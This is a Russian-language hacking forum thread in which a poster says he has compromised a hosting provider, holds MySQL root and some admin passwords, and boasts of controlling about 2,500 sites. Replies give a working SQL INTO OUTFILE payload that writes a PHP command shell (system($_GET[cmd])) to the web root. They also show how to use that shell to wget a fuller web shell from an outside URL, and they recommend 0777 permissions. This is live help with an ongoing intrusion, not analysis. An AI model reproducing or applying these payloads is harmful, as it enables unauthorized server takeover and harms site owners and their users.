![]() |
Root MySQL
Ребятишки, я вот взломал хостинг, там идиоты админы походу, есть у меня их пассы частично и рут к базе данных. Я могу получить рута на серваке?
|
насчет рута хз, но шелл можешь.
select 'web shell code' into outfile '/path_to_web_shell' |
Цитата:
|
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 :(
|
SELECT '<? system($_GET[cmd]); ?>' INTO OUTFILE 'ЗДЕСЬ локальная ДИРЕКТОРИЯ В КоТОРУЮ ТЫ ХОЧЕШЬ ПОМЕСТИТЬ ШЕЛЛ'
НЕзабудь про кавычки!Пример дириктории /www/site/users/htdocs/shell.php |
Цитата:
Я вот думаю, мне мучаться с root'ом, или нет? И так есть управление 2,5 тысячами сайтов :cool: И пароли администраторов... Правда, не все пароли. |
НУ это ты сам решай,а если так то удачи!
|
А еще!После того как ты выполнишь эту команду файл примет вид: shell.php,это командер!Чтобы залить полноценный шел надо сделать так!http://сайт/директория/shell.php?cmd=wget http://И адрес где лежит полноценный шелл!Можешь взять вот этот http://vrms.narod.ru/remview.php
|
Цитата:
|
ЭТО ПЛОХО!0777 рулит!
|
| Время: 21:11 |